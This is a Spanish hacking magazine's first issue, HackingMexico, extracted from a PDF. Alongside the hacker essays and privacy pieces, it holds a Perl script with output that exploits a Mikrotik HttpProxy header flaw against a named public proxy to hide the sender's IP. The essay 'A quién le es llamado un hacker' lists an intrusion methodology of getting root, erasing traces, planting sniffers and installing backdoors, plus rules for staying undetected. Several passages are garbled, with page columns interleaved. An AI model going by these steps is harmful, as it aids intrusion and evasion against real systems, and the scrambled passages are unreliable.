Está en la página 1de 46

P U B L C A T E

C O N

N O S O T R O S

informes 55 10 68 88 09
info@hackingmexico.mx

editorial

Editorial
Bienvenidos a esta primera
publicacion de HackingMexico la
revista mexicana de seguridad
informatica y hacking. Este ejemplar
que tienes en tus manos es el
resultado de un gran esfuerzo por
parte de todo el equipo.
HackingMexico nace con el
objetivo de concientizar y educar
sobre los riesgos actuales de la
seguridad, desde un punto de vista
practico y ofensivo que nos permitira
adentrarnos a la manera de pensar del
atacante.
El material esta enfocado para cualquier
persona que desee adentrarse o pulir sus
conocimientos sobre hacking.
Nuestra mision es fomentar el conocimiento,
recolectar informacion es el primer paso a la
sabiduria, pero compartirla es el primer paso para
construir una comunidad, es por eso que te brindamos un
host gratuito para que publiques tu blog y compartas tus
investigaciones con la comunidad.
Recuerda que todos los enlaces a las descargas del software
que se mencione en la pagina estar listado en el portal oficial
www.hackingmexico.mx, dentro de la seccin de revistas.
Esperemos disfrutes este primer ejemplar, tanto como nosotros
hacindolo.

El Equipo HackingMexico

M.C Raul Robles A. CEO

Agradecimientos a gente
que colaboro en este numero
M4ku4Z
Axxus
Profesor X
Zeus
Tognu
Molder Sombrero de Paja
Dr h47
Annika
No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos
y de investigacion, hackingmexico no incita a ningun tipo
de vandalismo virtual, cyberbullying, ni cyberamenzas.
La informacion es para conocimiento de todos, para poder

www.hackingmexico.mx

CorruptedByte
Death/ Scarlett Toquero
(idea lateral-Despacho Editorial)

Megabyte
Helios Mier
Y el apoyo recibido por los alumnos
de El Instituto Tecnologico de
Tuxtepec y la FES Aragon
aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como Anonymous, nosotros somos un grupo de
profesionales expertos en seguridad informatica que no
apoyan este tipo de actividades delictivas.

haxorpedia

Haxorpedia

qui se explicaran terminos


que se usaran a lo largo de
las publicaciones, para
que vayas adentrndote
un poco mas, y aclares tus dudas
cuando se hable de algn termino
que no comprendas.
No encontraras la definicin
standard de Wikipedia, sino una definicin compacta y de bolsillo sin
tanto rollo que te permitir entender
los conceptos rapidamente

esteganografia
leet
Tecnicas de ocultamiento de cdigo dentro Termino usado para describir a la elite
de archivos, usualmente de imagen

de los hackers, tambien es referido


como l33t

hacktivismo
Movimiento hacker con ideales polticos
0day
o de carcter social
Vulnerbilidad en un sistema que no ha
Cyruxnet
Portal antiguo de internet que
publicaba bugs y 0days

Jailbreak
Proceso el cual te deja instalar

aplicaciones no autorizadas por Apple


en dispositivos con iOS

sido del dominio publico, que lleva 0


dias activa

Bug
Error en un

sistema, un bicho.

elite
Minoria selecta

hax0r
Hacker

Exploit

Codigo o tecnica
que explota una
vulnerabilidad.

Ingenieria
Social Cookie
Tecnicas donde el objetivo es el ser
Archivo donde se guardan datos como
humano, burlar la ingenuidad.

Cracking

Metodos para saltear protecciones en software


como por ejemplo los Trial de 30 dias.

sesiones, passwords y tiempos.

XSS

Cross Site Scripting, tecnica que permite


el robo de cookies.
www.hackingmexico.mx

CONTENTS PAGE
a quin les llamado
un hacker

06

El
manifiesto
hacker

10

navegacin anonima
ocultando nuestras
huellas en internet

16

Hackintosh jailbreak en
dispositivos IOS

24

robo de identidad
mediante crimeware

30

www.hackingmexico.mx

facebook: explotando
al ser humano

12

vulnerabilidad
mikrotik httpproxy
callando al
chismoso

14

hacking
microsoft
c#

22

Robo de
cuentas
FTP

26

riesgos de
seguridad
en IPV

old school
Cyruxnet

40

www.hackingmexico.mx

contents page

a quin le es llamado un hacker

Aquinle es llamado un

Hack

^POr
Jess Antonio
Alvarez Cedillo
Tognu
IPN-CIDETEC

legando al ao 2000,
En el 2000 Microsoft desarrollo
los piratas de los sisun
concepto que ha marcado desde
temas informticos
entonces
una actividad ilegal
se representan con
llamada
PIRATERIA,
aunque tambin
una persona con un cerebro desallaman
paratas
a
los
delincuentes
rrollado, curioss y con muy pocas
informticos.
Resulta
que
ahora los
armas: una simple computadora y
piratas
ya
no
tienen
un
parche en
una lnea telefnica. Hackers. Una
su
ojo
ni
un
garfio
en
reemplazo
de la
palabra que an no se encuentra en
mano.
Tampoco
existen
los
barcos
ni los
los diccionarios pero que ya suena
tesoros
escondidos
debajo
del
mar,
tampoco
en todas las personas que alguna
matan,
asesinan
y
violan
mujeres.
vez se interesaron por la informtica o leyeron algn diario. Proviene
de hack, el sonido que hacan los
(crack=destruir) son aquellas personas que
tcnicos de las empresas telefnicas al golsiempre buscan molestar a otros, piratear
pear los aparatos para que funcionen.
software protegido por leyes, destruir sisHoy es una palabra temida por emtemas muy complejos mediante la transmipresarios, legisladores y autoridades que
sin de poderosos virus, etc.
desean controlar a quienes se divierten
Generalmente son adolescentes inquiedescifrando claves para ingresar a lugares
tos que aprenden rpidamente este compleprohibidos y tener acceso a informacin
jo oficio. Se diferencian con los Hackers
indebida. En 1997, el 54 %de las empresas
porque no poseen ningn tipo de ideologa
norteamericanas sufrieron ataques en sus
cuando realizan sus trabajos. En cambio,
sistemas y ocasionaron prdidas totales de
el principal objetivo de los Hackers no es
137 millones de dlares en ese mismo ao.
convertirse en delincuentes sino pelear
El Pentgono, la CIA, UNICEF, La
contra un sistema injusto utilizando como
ONU y diversos organismos mundiales
arma al propio sistema. Su guerra es silenhan sido vctimas de intromisiones.
ciosa pero muy convincente.
Un hacker puede tardar meses en vulLa cultura popular define a los hackers
nerar un sistema ya que son cada vez ms
como aquellos que, con ayuda de sus conosofisticados. Pero el lema es viejo: hecha la
cimientos informaticos consiguen acceder a
ley, hecha la trampa.
los sistemas de los bancos y de los negociaMicrosoft por su parte, el sistema opedos del gobierno. Bucean por informacion
rativo ms popular y el ms atacado y los
que no les pertenece, roban software caro y
El termino comenzo a usarse aplicandomedios de comunicacin masivos prefierealizan transacciones de una cuenta bancalo a un grupo de pioneros de la informatica
ren tildarlos de delincuentes que intercepria a otra. Los criminologos, por otra parte,
del MIT, a principios de la decada de 1960.
tan cdigos de tarjetas de crdito y los utidescriben a los hackers en terminos menos
Desde entonces, y casi hasta finales de la
lizan para beneficio propio.
halagadores. Donn Parker los denomina viodecada de 1970, un hacker era una persona
Sin embargo tambin existen los que se
ladores electronicos y August Bequai los
obsesionada por conocer lo mas posible sointrometen en los sistemas de aeropuertos
describe como vandalos electronicos. Ambre los sistemas informaticos (Figura2). Los
produciendo un caos en los vuelos y en los
bos, aunque aseveran que las actividades de
diseadores de la computadora Apple, Jobs
horarios de los aviones. Pero he aqu la
los hackers son ilegales, eluden habilmente
y Wozniack, pueden considerarse hackers
gran diferencia en cuestin. Los crackers
llamarlos criminales informaticos.
en este sentido de la palabra.

www.hackingmexico.mx

a quien le es llamado un hacker

er

www.hackingmexico.mx

a quin le es llado un hacker

principios de la decada de
1980, influenciados por
la difusion de la pelicula
Juegos de Guerra, y el ampliamente publicado arresto de una banda de hackers conocida como la 414, los
hackers pasaron a ser considerados como
chicos jovenes capaces de violar sistemas
informaticos de grandes empresas y del
gobierno. Desgraciadamente, los medios
de informacion y la comunidad cientifica
social no ha puesto mucho esfuerzo por
variar esta definicion. El problema para
llegar a una definicion mas precisa radica, tanto en la poca informacion que hay
sobre sus actividades diarias, como en el
hecho de que lo que se conoce de ellos
no siempre cabe bajo las etiquetas de los
delitos conocidos.
Parker reconoce que el hacking no
abarca todo el rango de actividades asociadas a la violacion de los sistemas informaticos, pero lo prefiere al termino
phreaking, que considera muy oscuro.
Por otra parte, Bequai no rechaza el termino phreaking y a menudo lo aplica a

Hacker:una persona
obsesionada por
conocer lo mas
posible sobre
los sistemas
informaticos.

Hack
hechos que Parker califica como de hacker. Bequai confunde aun mas el termino al definir al hacker como alguien que
utiliza ilegalmente las tarjetas de credito
telefonico para acceder a sistemas que
distribuyen software comercial ilegalmente. Veremos que esto tiene poco que
ver con las actuaciones propias de los hackers, pero es ilustrativa de otros tipos de
actividades informaticas inusuales.
Los terminos, hacker, phreaker
y pirata se presentan y definen
tal y como los entienden aquellos que se identifican con estos
papeles.En primer lugar, el area
de los hackers. En la tradicion de
esta comunidad informatica, el
hacker puede realizar dos tipos
de actividades:

METODOLOGIA PARA

HACKEAR

Para aquellos que quieren realizar


esta actividad, existe una metodologa conocida, sin embargo siempre
hay cosas que aprender. La metodologa es la siguiente:
1. Introducirse en el sistema que
tengamos como objetivo.
2. Una vez conseguido el
acceso, obtener privilegios
de root (superusuario).
3. Borrar las huellas.
4. Poner un sniffer para
conseguir logins de otras
personas.
5. Instalar puertas traseras

www.hackingmexico.mx

1. Acceder a un sistema informatico: el termino lleva asociados


las herramientas y trucos para
obtener cuentas de usuarios validos de un sistema informatico.
2. Explorar y aprender a utilizar
un sistema informatico.
Contrariamente a lo que piensan
los medios de comunicacion, la
mayoria de los hackers no destruyen y no daan deliberadamente
los datos. El hacerlo iria en contra
de su intencion de mezclarse con el
usuario normal y atraeria la atencion sobre su presencia, haciendo
que la cuenta usada sea borrada.
Despues de gastar un tiempo sustancioso en conseguir la cuenta,
el hacker pone una alta prioridad
para que su uso no sea descubierto.
Ademas de la obvia relacion entre las dos acepciones, la palabra

hacker se reserva generalmente a


aquellos que se dedican al segundo tipo.
En otras palabras, un hacker es una persona que tiene el
conocimiento, habilidad y deseo de
explorar completamente un sistema informatico. El mero hecho de conseguir el acceso (adivinando la clave de acceso) no es
suficiente para conseguir la denominacion.
Debe haber un deseo de liderar, explotar y
usar el sistema despues de haber accedido a
l. Esta distincion parece logica, ya que no
todos los intrusos mantienen el interes una
vez que han logrado acceder al sistema. En
el submundo informatico, las claves de acceso y las cuentas
suelen intercambiarse y ponerse a disposicion del uso general. Por tanto, el hecho
de conseguir el acceso puede considerarse
como la parte facil, por lo que aquellos
que utilizan y exploran los sistemas son los
que tienen un mayor prestigio.
La segunda actividad es la de los
phreakers telefonicos. Se convirtio en una
actividad de uso comun cuando se publicaron las aventuras de John Draper, en un
articulo de la revista Esquire, en 1971. Se
trata de una forma de evitar los mecanismos de facturacion de las compaas telefonicas. Permite llamar a de cualquier parte del mundo sin costo practicamente. En
muchos casos, tambien evita, o al menos
inhibe, la posibilidad de que se pueda trazar el camino de la llamada hasta su origen,
evitando asi la posibilidad de ser atrapado.

TAXONOMIA HACKER
La clasificacin general de las actividades de un hacker son clasificadas por
la idiologia con la que actua. Los colores
representan una ideologa y un comportamiento. La clasificacin solo tiene tres
categorias hacker:
1. Black hats: Gente apasionada por
la seguridad informtica. Esto concierne principalmente a entradas remotas no autorizadas por medio de
redes de comunicacin como Internet
para sacar o no provecho.
2. White hats: Incluye a aquellos que depuran y arreglan errores en los sistemas.
3. Grey hats:A los de moral ambigua.
QUE SE NESECITA
PARA SER UN HACKER?
Los hackers necesitan caros equipos
informticos y una estantera rellena de
manuales tcnicos?. La respuesta es NO!
,Hackear puede ser sorprendentemente fcil, mejor todava, si se sabe cmo
explorar el World Wide Web, se puede
encontrar casi cualquier informacin relacionada totalmente gratis. De hecho,
hackear es tan fcil que si se tiene un servicio on-line y se sabe cmo enviar y leer
un e-mail, se puede comenzar a hackear
inmediatamente. LA TECNICA llamada
GOOGLE HACKING (figura 4) es una
herramienta simple y sencilla donde solo
se necesita un navegador de Internet y el
servicio de busqueda GOOGLE.

Google Hacking.

Par la mayor parte de los miembros


del submundo informatico, esta es simplemente una herramienta para poder realizar llamadas de larga distancia sin tener
que pagar enormes facturas. La cantidad
de personas que se consideran phreakers,
contrariamente a lo que sucede con los hackers, es relativamente pequea. Pero aquellos que si se consideran phreakers lo hacen
para explorar el sistema telefonico.
La mayoria de la gente, aunque usa
el telefono, sabe muy poco acerca de l.
Los phreakers, por otra parte, quieren
aprender mucho sobre el. Este deseo de
conocimiento lo resume asi un phreaker
activo: El sistema telefonico es la cosa
mas interesante y fascinante que conozco. Hay tantas cosas que aprender. Incluso los phreakers tienen diferentes areas
de conocimiento.
El emblema hacker, un proyecto para
crear un smbolo reconocible para la percepcin de la cultura hacker. Generalmente este simbolo vienen de el juego
de la vida, un programa que representa el
inicio de la inteligencia
artificial y que por conviccin es
aceptado por todas las comunidades hackers del mundo (figura 3).

a quien le es llado un hacker

Emblema Hacker. (figura 3)

ker

Un Hacker
generalmente
tiene sus
reglas aunque
estas sean
muy sencillas,
estas son:

I
II
III
IV

Nunca destroces nada intencionalmente


en la Computadora que ests crackeando.

Modifica solo los archivos que hagan


falta para evitar tu deteccin y asegurar tu acceso futuro al sistema.
Nunca dejes tu direccin real, tu nombre o tu telfono en ningn sistema.

Ten cuidado a quien le pasas informacin. A ser posible no pases


nada a nadie que no conozcas su voz, nmero de telfono y nombre real.

Nunca dejes tus datos reales en un


BBS, si no conoces al sysop, djale
un mensaje con una lista de gente que pueda
responder de ti.

VI

Nunca hackees en computadoras


del gobierno. El gobierno puede
permitirse gastar fondos en buscarte mientras que las universidades y las empresas
particulares no.

VII

No uses BlueBox a menos que


no tengas un servicio local o
un 0610 al que conectarte. Si se abusa de la
bluebox, puedes ser cazado.

VIII

No dejes en ningn BBS mucha informacin del sistema


que estas crackeando. Di sencillamente estoy
trabajando en un UNIX o en un COSMOS....
pero no digas a quien pertenece ni el telfono.

IX

No te preocupes en preguntar, nadie te contestara, piensa que por


responderte a una pregunta, pueden cazarte
a ti, al que te contesta o a ambos.

Punto final. ce hackeando, no sabrs


lo que es.

www.hackingmexico.mx

el manifiesto hacker

mani
Uno ms ha sido capturado hoy,
Est en todos los peridicos.
Adolescente arrestado por delito informtico
Hacker arrestado por irrumpir en un sistema bancario.
//-Malditos muchachos. Son todos iguales.//
Pero pueden, con su psicologa barata y su cerebro de los aos
cincuenta, siquiera echar un vistazo a lo que hay detrs de los
ojos de un hacker? Se han parado alguna vez a pensar qu es lo
que le hace comportarse as, qu le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . .
El mo es un mundo que comienza en la escuela . . .
Soy ms inteligente que la mayora de los otros muchachos, esa
basura que ellos nos ensean me aburre . . .
//-Malditos subrealizados. Son todos iguales.//
Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez
como reducir una fraccin.
Yo lo entiendo.
-No, Srta. Smith, no le voy a mostrar mi trabajo,
lo hice en mi mente . . .
//-Maldito muchacho. Probablemente se lo copi. Todos son iguales.//

10

www.hackingmexico.mx

Hoy hice un descubrimiento.


Encontr una computadora.
Espera un momento, esto es lo mximo. Esto hace lo que yo le
pida. Si comete un error es porque yo me equivoqu.
No porque no le gusto . . .
O se siente amenazada por mi . . .
O piensa que soy un engredo . . .
O no le gusta ensear y no debera estar aqu . . .
//-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
Y entonces ocurri . . .
una puerta abierta al mundo . . .
Corriendo a travs de las lneas telefnicas como la herona a
travs de las venas de un adicto, un pulso electrnico es enviado,
un refugio para las incompetencias del da a da es buscado . . .
una tabla de salvacin es encontrada.
Este es . . . este es el lugar a donde pertenezco . . .
Los conozco a todos aqu . . .
aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva
a escuchar de ellos otra vez . . Los conozco a todos . . .
//-Malditos muchachos. Enlazando las lneas telefnicas otra vez.
Todos son iguales . . .//
Apuesta lo que quieras a que todos somos iguales . . .

fiesto

el manifiesto hacker

lE

Hacker

Nos han estado dando comida para bebs con cuchara en la escuela, cuando estbamos hambrientos de carne . . .
Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor.
Hemos sido dominados por los sdicos, o ignorados por los apticos.
Los pocos que tenan algo que ensearnos encontraron en nosotros alumnos atentos, pero esos pocos son como gotas de agua en
el desierto.
Este es nuestro mundo ahora . . .
El mundo del electrn y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que podra ser ridculamente barato, si no estuviera en manos de glotones hambrientos de ganancias, y ustedes nos llaman criminales.
Nosotros exploramos . . .
y ustedes nos llaman criminales.
Nosotros buscamos detrs del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos . . . y ustedes nos llaman criminales.
Ustedes construyen bombas atmicas,
ustedes hacen la guerra,

asesinan, engaan y nos mienten


y tratan de hacernos creer que es por nuestro bien,
ahora nosotros somos los criminales.
Si, soy un criminal.
Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan,
no por como se ven.
Mi crimen es ser mucho ms inteligente que ustedes, algo por lo
cual jams podrn perdonarme.
Soy un Hacker, y este es mi manifiesto.
Pueden detener a este individuo, pero no podrn detenernos a
todos despus de todo, todos somos iguales.

TheMentor
www.hackingmexico.mx

11

vanidad mi pecado favorito

vanidad
Mi pecado

favorito

Fenomeno social

Independientemente de si eres religioso, todos hemos caido en uno u otro de los


pecados capitales, los que hayan visto la pelicula de El abogado del diablo recordaran
una frase peculiar.
Y esto es precisamente lo que explotan las redes sociales. Muchos de nosotros por
ahi del 2000 nos preocupabamos por que alguien tuviera el control de nuestras vidas y
nuestros movimientos, nos preocupabamos por la privacidad, se nos hacia factible que el
gobierno implantara chips en nuestro cuerpo para poder rastrearnos via GPS, seria el final de
nuestra privacidad cierto?

Explotando la vanidad

Pues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros
mismos sin que nadie nos obligue hacemos check in en facebook, o taggeamos a la gente con la que
estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en
su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros
mismos facilitamos esto simplemente por vanidad.
Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario
vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.
Por ejemplo un criminal podra utilizar esta informacin para saber que no estas en casa, que te fuiste a un
concierto y que regresaras en muchas horas.
Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fiestas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.
Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza humana, han explotado nuestra VANIDAD.

Alterando el curso de la vida

La gente en tu vida, esta por temporadas, salvo la familia y algunas exepciones. Facebook nos facilita conectarnos con gente de
nuestro pasado, regresar con antiguas novias (regresar con una ex , es como ir a la venta de garaje y comprar tus porqueras de
nuevo), y esto hace que perdamos la oportunidad tal vez de conocer gente nueva que estaba destinada para nosotros, desde tiempos
antropolgicos las relaciones del ser humano han sido temporales, y ahora estamos alterando el curso natural de la vida.

Expl
serhu

Facebook :
POr
M.C Raul Robles A
Megabyte

12

www.hackingmexico.mx

al

vanidad mi pecado favorito

EXIF Exchangeable
image file format

Definicion de Wikipedia:
Las etiquetas (tags) de metadatos definidas en el estndar Exif cubren un amplio espectro
incluido:
Informacin de fecha y hora. Las cmaras digitales registran la fecha y la hora actual y la
almacenan en los metadatos.
Configuracin de la cmara. Esta incluye informacin esttica como el modelo de cmara y el
fabricante, e informacin que varia con cada imagen como la orientacin, apertura, velocidad del
obturador, distancia focal, medidor de exposicin y la velocidad de la pelcula.
Informacin sobre localizacin, la cual podra provenir de un GPS conectado a la cmara. Hasta el
2004 solo una pocas cmaras lo soportaban

Geolocalizacion

Cada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan
en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fcilmente, y nos revelan una cantidad
enorme de datos, incluyendo tu localizacin exacta con coordenadas GPS
A travez de una sencilla aplicacin, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de
google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.
Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una
interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningn tipo de software
mediante la pagina exifdata.com

Conclusion

Para evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya
borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.

otando
mano

www.hackingmexico.mx

13

vulnerabilidad

Vulnerabili
C

uando navegamos en la nube


y queremos mantener nuestro
anonimato es comn recurrir
al uso de PROXYS que no son mas que otra
computadora que con ayuda de un software
sirve de intermediara en la comunicacin
presentndose como nosotros.
Existen principalmente 3 tipos de proxys.
1. Proxy Tranparente: Este tipo de proxy agrega a nuestras peticiones HTTP
cabeceras para anunciar su uso (XProxy-ID, Via) ademas del origen de la
peticin (X-Forwarded-For).
2. Proxy Annimo: Agregan cabeceras
de reconocimiento de proxy (X-ProxyID, Via) sin embargo no agrega la cabecera X-Forwarded-For.
3. Proxy de Alto anonimato: Este tipo
de proxy no modifica la peticin HTTP
original imposibilitando en primera
instancia la deteccin de su uso y mucho menos nuestra identidad.
La cabecera HTTP que mas nos causara problemas de las antes
mencionadas es X-Forwarded-For ya que en ella se almacenan las
direcciones IP que han tenido lugar en la comunicacin y por lo
tanto nuestra IP original.
A que problema nos enfrentamos?
Es comn la escaeces de proxys annimos de uso publico por lo
tanto solo sobran los proxys transparentes que exponen nuestra
identidad. Veamos aqu un ejemplo de peticin HTTP con un proxy transparente:

HTTP /1.1 200 OK


DATE:WEB,30 HAR 2011 17:17:41 GHT
Server:Apache/2.214(Unix) PHP /5.3.2
Transfer-Encoding:chunked
Content-Type:message/http
92
Trace/HTTP/1.1
Host:www.metroflog.com
X-Proxy-ID:2863273154
X-Forwarded-For:201
V1a:1.1 192.168.10.1 (Mikrotik HttpProxy)
Como podemos ver el Servidor proxy modifica la peticin original
agregando cabeceras que irn con el chisme de quienes somos.

14

www.hackingmexico.mx

molder@aztlan-hack.org
Aztlan Hack / http://www.aztlan-hack.org

Mikrotik HttpProxy

vulnerabilidad

dad

Por Molder Sombrero de Paja

Callando al Chismoso

Como solucionamos el problema?


Afortunadamente para nosotros existe una vulnerabilidad en Servidores Proxy que usan software Mikrotik HttpProxy. Esta vulnerabilidad nos permite alterar la cabecera X-ForwardedFor evitando que nuestra IP real sea enviada, para lograrlo debemos agregar esta cabecera
desde el inicio de la comunicacin es decir desde el momento que sale de nuestra computadora dndole como valor un Final de cadena con el fin de que el software del proxy ignore
lo que se pueda agregar a lo largo de la comunicacin.
X-Forwarded-For=\0 X-Forwarded-For=\0,xxx.xxx.xxx.xxxX-Forwarded-For=\0
A continuacin aremos una prueba de explotacin de la vulnerabilidad haciendo una peticin HTTP desde un pequeo script en PERL
y usando como proxy 41.204.56.89:8080.
Notemos que agregamos X-ForwardedFor:\0 en la cabecera de la peticin.
#!/usr/bin/perl
#Sombrero de paja Molder
#30 Mar 2011
use IO::Socket::INET;
$host = $ARGV[1];
$method = $ARGV[0];
$proxy = 41.204.56.89;
$puerto = 8080;
my $sock = IO::Socket::INET>new(PeerAddr => $proxy
PeerPort => $puerto,
Proto => tcp);
print $sock $method /
HTTP/1.1\r\nHost: $host\r\
nConnection: Keep-Alive\r\nXForwarded-For:\0\r\n\r\n;
while($linea = <$sock>)
{
print $linea;
}

Al ejecutar el script obtenemos el siguiente


resultado:
alinux-6nwf:/srv/www/htdocs/
tracing> perl http.peal TRACE
www.metroflog.com
HTTP/1.1 200 OK
Date: web, 38 Har 2011
17:19:17 GHT
Server: Apache/2.2.14 (Unix)
PHP/5.3.2
Transfer-Encoding: chunked
Content-Type: message/http
84
TRACE/HTTP/1.1
Host:www.metroflog.com
X-Forwarded-For:
X-Proxy.ID:2863273154
Via: 1.1 192.168.10.1
(Mikrotik HttpProxy)
Como podemos ver la cabecera X-Forwarded-For aparece sin contenido y consecuentemente nuestra IP no fue enviada volviendo as un PROXY TRASPARENTE
en un PROXY ANONIMO.
Para un uso mas mundano esto lo podemos lograr con algunos plugins como
el llamado Modify Header de Firefox el
cual nos permite agregar o modificar el valor de las cabeceras HTTP antes de iniciar
la comunicacin.
Esta Vulnerabilidad no ha sido reportada y
hasta la fecha sigue en funcionamiento.

www.hackingmexico.mx

15

navegacin annima

NAVEGACIN
ANNIMA

OCULTANDO
NUESTRAS HUELLAS

E N I N T E R N E T

D
Por Rodolfo H.Baz aKa Pr@fEsOr X

esde los primeros das del ao 1999, en


que en esos aos empezaran mis andanzas
por internet y sus alrededores me vi en la
necesidad de ocultar mi identidad, esto con
el fin de hacer ms complicado el rastrearme, por obvias razones ;), en esta serie de
artculos trataremos de explicar todas las
tcnicas que son usadas para ocultar nuestra identidad ya sea en redes internas o externas como lo es el ciberespacio, para que
no les vaya a pasar como a un amigo que
en un evento masivo quiso atacar con una
denegacin de servicio a los servidores de

16

www.hackingmexico.mx

ese evento y sinti que no lo podan detectar y pues no previo ciertas cosas y en
menos de 20 minutos ya haba sido detectado y lo estaban ya sacando del evento.
xD, que recuerdos. Ahora si como dice el
dicho el diablo sabe ms por viejo que por
diablo con esta moraleja quiero prevenir
a todos nuestros lectores y lo pondr entre
comillas que tengan en la mente que nunca de los nunca ocultaremos nuestra IP al
100% y que siempre habr forma de rastrearte y localizarte.
CONEXINES POR
DEFAULT A INTERNET
Normalmente una conexin a internet
la hacemos de nuestra computadora a un
router el cual sirve como puerta de enlace

hacia los servicios que nos conectemos, en


este caso Internet, donde el usuario tiene
una IP interna, la cual es asignada por el
protocolo DHCP, y que por default en la
mayora de los casos est estructurada en
el rango 192.168.1.XX donde las XX serian nmeros asignados del 1 al 254, una
vez asignada el router se conecta con el ISP
Internet Service Provider con el cual tenemos contratado el servicio de Internet y
este nos asigna una IP que en nuestro caso
en servicios caseros sera una IP Dinmica
Publica y con esta podremos navegar en
internet adems es la que nos identificar
y quedar registrada en los logs de todos
los lugares que visitemos, esta IP es como
nuestra huella digital que queda plasmada
en todo lo que tocamos, ah est el punto y

navegacin annima

el detalle como deca Cantinflas, el chiste


de todo esto es que la IP que nos asigna
nuestro ISP y que nos identifica, no quede
guardada en los servidores que visitamos,
sea hay que camuflajearla con otra IP para
que la que quede almacenada no sea la de
nosotros si no la de otra PC as podremos
navegar con cierto grado de anonimato.
TECNICAS DE
NAVEGACIN ANONIMA
USADAS EN LA ACTUALIDAD
Existen muchas tcnicas de navegacin
annima que pueden ser usadas ya sea individualmente o combinadas, que darn un
cierto rango de anonimato, a mi punto de
vista la mejor forma de ocultarnos es usarlas en su forma combinada para incrementar el rango de efectividad.
Entre las tcnicas usadas hoy en da tenemos las siguientes:
Proxy Server
Proxy Chain Server
Wingate
Bouncers
Mac Spoofing
Red Distribuida TOR
VPN Tunelling
HTTP Headers Spoofing
WGroup Spoofing
Tcnicas de verificacin de Identidad
Entre otras
PROXY SERVER
La primera forma y la ms sencilla de usar
y es conectarnos a Internet por medio de
un servidor Proxy de Web ms conocido
como Proxy, estos nos permiten conectarnos
a otros equipos de una red de forma indirecta
a travs de l, cuando un equipo de la red desea acceder a una informacin o recurso, es
realmente el Proxy quien realiza la comunicacin y a continuacin traslada el resultado
al equipo inicial. En unos casos esto se hace
as porque no es posible la comunicacin directa y en otros casos porque el Proxy aade
una funcionalidad adicional, como puede ser
la de mantener los resultados obtenidos (por
ej.: una pgina Web) en una cache que permita acelerar sucesivas consultas coincidentes. Con esta denominacin general de Proxy
se agrupan diversas tcnicas.

Los Proxy
Ventajas

En general, los proxies hacen


posibles varias cosas nuevas:

Control. Slo el intermediario

hace el trabajo real, por tanto se


pueden limitar y restringir los
derechos de los usuarios, y dar
permisos slo al Proxy.

Ahorro. Por tanto, slo uno

de los usuarios (el Proxy) ha


de estar equipado para hacer el
trabajo real.

Velocidad. Si varios clientes

van a pedir el mismo recurso, el


Proxy puede hacer cach: guardar
la respuesta de una peticin para
darla directamente cuando otro
usuario la pida. As no tiene que
volver a contactar con el destino, y
acaba ms rpido.
Filtrado. El Proxy puede
negarse a responder algunas
peticiones si detecta que estn
prohibidas.

Modificacin. Como

intermediario que es, un Proxy


puede falsificar informacin, o
modificarla siguiendo un algoritmo.

Anonimato. Si todos los


usuarios se identifican como uno
slo, es difcil que el recurso
accedido pueda diferenciarlos.
Pero esto puede ser malo, por
ejemplo cuando hay que hacer
necesariamente la identificacin.

Desventajas

En general, el uso de un
intermediario puede provocar:

Abuso. Al estar dispuesto a

recibir peticiones de muchos


usuarios y responderlas, es
posible que haga algn trabajo
que no toque. Por tanto, ha de
controlar quin tiene acceso y
quin no a sus servicios, cosa
que normalmente es muy difcil.

Carga. Un Proxy ha de hacer


el trabajo de muchos usuarios.

Intromisin. Es un paso ms

entre origen y destino, y algunos


usuarios pueden no querer pasar
por el Proxy. Y menos si hace de
cach y guarda copias de los datos.

Incoherencia. Si hace

de cach, es posible que se


equivoque y d una respuesta
antigua cuando hay una ms
reciente en el recurso de destino.

Irregularidad. El hecho de

que el Proxy represente a ms de un


usuario da problemas en muchos
escenarios, en concreto los que
presuponen una comunicacin
directa entre 1 emisor y 1 receptor
(como TCP/IP).

www.hackingmexico.mx

17

navegacin annima

En concreto lo que debemos hacer para utilizar un


servidor Proxy Web es primero
conseguir un Proxy (nmero y
puerto). Podemos sacar uno de esta
pgina: http://www.publicproxyservers.com/
Una vez que consigamos el Proxy
y nos aseguremos que sea bueno, que
significa cuando digo que sea bueno?,
como podrn ver en la link que les di
encontrarn algo como esto:(imagen)
IP
203.160.1.54

Una vez que escogimos un


buen servidor Proxy tenemos
que decirle a nuestro equipo que
se conecte a travs de l, para eso
vamos a ir (usando FIREFOX) a Herramientas > opciones > avanzado > red
> Configurar como se conecta Firefox y
despus escribimos nuestro Proxy en las
casillas de abajo (direccin por un lado
y puerto por otro) y seleccionamos la
casilla usar el mismo proxy para todo
en el caso que vayas a usar el proxy para
conectarte a un ftp o una conexin SSL

Port

Type

Country

Last Test

80

transparent

Vietnam

2012-01-18

200.174.85.193

3128

transparent

Brazil

2012-01-18

165.228.131.12

80

transparent

Australia

2012-01-18

203.144.144.164

80

transparent

Thailand

2012-01-18

3128

transparent

Switzerland

2012-01-18

80

anonymity

United States

2012-01-18

62.65.159.183
